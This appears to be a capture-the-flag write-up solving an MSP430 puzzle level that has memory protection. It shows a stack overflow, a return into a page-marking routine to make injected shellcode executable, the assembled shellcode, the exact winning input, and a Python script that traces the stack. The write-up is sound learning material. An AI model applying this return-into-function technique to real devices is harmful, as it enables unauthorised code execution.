This level introduces <set_up_protection> to enable memory protection.

We can immediately identify that there is a stack buffer overflow tied to the input. This grants us control of the PC / Return Address.

Hex Input: 0102030405060708090a0b0c0d0e0f101112

pc: 1211

Now that we have control of the PC, we need to trigger the 0x7f interrupt to solve the level.

We can write our unlock shellcode onto the stack. However, the memory page where it is located has not been marked as executable, so we cannot return to the shellcode immediately.

Instead we need to return into <mark_page_executable> to mark the location of our shellcode as executable.

Our input on the stack begins at 0x3fee in page 0x3f** and continues into 0x40** after our overflowed return address. We will place the shellcode at 0x3f** since it allows for a smaller input.

We cannot return directly to the start of <mark_page_executable> since it uses r15 as the memory page location argument, and we do not have direct control of r15. However, we can set up the stack ourselves and return into 44ba: 3180 0600 sub #0x6, sp.

When <mark_page_executable> finishes, it performs add #0xa, sp and ret. Because we control the stack contents at that point, the ret returns into our shellcode located at 0x3fee.

Shellcode:
mov #0xff00,sr
mov #0x10,pc

Assembled: 324000ff30401000

The value #0xff00 is the final value of sr when 0x7f is provided as an argument to the <INT> function in previous levels.

Our winning input is: 324000ff304010004141414141414141ba443f000000ee3f
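
The stack layout above can be checked by mapping each word of the input to its address and following sp through both returns. This is an added example, not part of the original write-up; the function names are hypothetical, and it assumes nothing between sub #0x6, sp and add #0xa, sp changes sp overall.

```python
import struct

BUF_START = 0x3FEE  # where the write-up says the input begins on the stack
RET_OFFSET = 16     # the probe put bytes 0x11 0x12 in pc, so 16 bytes precede it
PROBE = "0102030405060708090a0b0c0d0e0f101112"
WIN = "324000ff304010004141414141414141ba443f000000ee3f"


def words(hex_input, base=BUF_START):
    """Map each little-endian 16-bit word of the input to its stack address."""
    data = bytes.fromhex(hex_input)
    if len(data) % 2:
        data += b"\x00"  # pad so a trailing odd byte still appears
    return {base + i: struct.unpack_from("<H", data, i)[0]
            for i in range(0, len(data), 2)}


def trace(hex_input):
    """Follow sp through the two returns described in the write-up."""
    mem = words(hex_input)
    ret_slot = BUF_START + RET_OFFSET  # 0x3ffe, the last word of page 0x3f
    sp = ret_slot + 2                  # first ret pops the word: sp = 0x4000
    arg_base = sp
    sp -= 0x6                          # sub #0x6, sp (the instruction at 44ba)
    # Assumption: whatever runs between sub and add leaves sp unchanged overall.
    sp += 0xA                          # add #0xa, sp
    return {
        "ret_slot": ret_slot,
        "first_pc": mem.get(ret_slot),
        "stack_args": [mem.get(a) for a in range(arg_base, sp, 2)],
        "second_ret_slot": sp,
        "second_pc": mem.get(sp),      # None if the input stops short of it
    }


if __name__ == "__main__":
    for name, payload in (("probe", PROBE), ("winning", WIN)):
        print(name)
        for addr, word in sorted(words(payload).items()):
            print(f"  {addr:#06x}: {word:04x}")
        for key, val in trace(payload).items():
            print(f"  {key}: {val}")
```

The trace shows why the final ee3f sits four bytes past the overwritten return address: sp nets +4 across the sub/add pair, so the second ret reads from 0x4004.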